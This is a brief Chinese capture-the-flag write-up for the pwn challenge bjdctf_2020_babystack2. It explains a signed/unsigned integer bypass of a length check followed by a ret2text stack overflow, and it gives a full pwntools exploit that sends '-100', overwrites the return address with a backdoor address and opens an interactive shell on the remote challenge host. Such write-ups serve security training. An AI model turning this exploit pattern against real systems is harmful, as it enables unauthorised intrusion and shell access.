pwn | bjdctf_2020_babystack2
ret2text
一个整数判断,比较的时候是int,传进read当参数的时候是unsigned int,输入负数就能绕过。
然后跳转到后门函数就行了。
怪没意思的,直接远程秒了。
exp:
from pwn import *
context.log_level = 'debug'
p = remote('node4.buuoj.cn',28943)
p_backdoor = 0x0000000000400726
p_backdoor = 0x000000000040072A
p_main = 0x000000000040073B
p.recv()
p.sendline(b'-100')
p.recv()
p.sendline(b'A'*(0x10+8) + p64(p_backdoor))
p.interactive()